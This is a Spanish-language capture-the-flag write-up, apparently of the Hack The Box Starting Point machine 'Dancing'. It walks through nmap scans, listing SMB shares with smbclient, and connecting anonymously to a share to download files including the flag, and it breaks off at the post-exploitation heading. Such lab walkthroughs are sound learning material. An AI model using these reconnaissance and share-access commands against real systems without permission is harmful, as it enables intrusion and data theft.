Dancing
Dancing es una máquina del Starting Point, para ser de Sistema Operativo Windows, es una excelente máquina para iniciar
Recopilación de información
1
2
3
4
5
6
7
8
❯ ping -c 1 10.129.197.183
PING 10.129.197.183 (10.129.197.183) 56(84) bytes of data.
64 bytes from 10.129.197.183: icmp_seq=1 ttl=127 time=84.5 ms
--- 10.129.197.183 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 84.479/84.479/84.479/0.000 ms
De esta traza ICMP
podemos obtener que, debido al ttl=127
, estamos frente a una máquina Windows.
Hacemos un escaneo con la herramienta nmap:
1
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.197.183 -oG allPorts
Resultado:
1
2
3
4
5
6
7
8
9
10
11
12
PORT STATE SERVICE REASON
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open msrpc syn-ack ttl 127
49665/tcp open msrpc syn-ack ttl 127
49666/tcp open msrpc syn-ack ttl 127
49667/tcp open msrpc syn-ack ttl 127
49668/tcp open msrpc syn-ack ttl 127
49669/tcp open msrpc syn-ack ttl 127
Luego, realizamos un escaneo más detallado para identificar versiones y servicios:
1
nmap -sCV -p135,139,445,5985,47001,49664,49665,49666,49667,49668,49669 10.129.197.183 -oN targeted
Resultado:
1
2
3
4
5
6
7
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
...
Análisis de vulnerabilidades
Por el puerto 445
, encontramos que está corriendo microsoft-ds?
, relacionado con SMB
. Este servicio puede ser explotado para compartir recursos en la red. Usando smbclient
, listamos los servicios disponibles:
1
smbclient -L 10.129.197.183
Salida:
1
2
3
4
5
6
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
Nos conectamos al recurso WorkShares
:
1
smbclient \\\\10.129.197.183\\WorkShares
Salida:
1
2
3
4
smb: \> ls
. D 0 ...
Amy.J D 0 ...
James.P D 0 ...
Explotación de vulnerabilidades
Entramos al directorio Amy.J
y descargamos un archivo:
1
smb: \Amy.J\> get worknotes.txt
Hacemos lo mismo en James.P
:
1
smb: \James.P\> get flag.txt
Post-Explotación
Revisamos los archivos descargados y analizamos el contenido: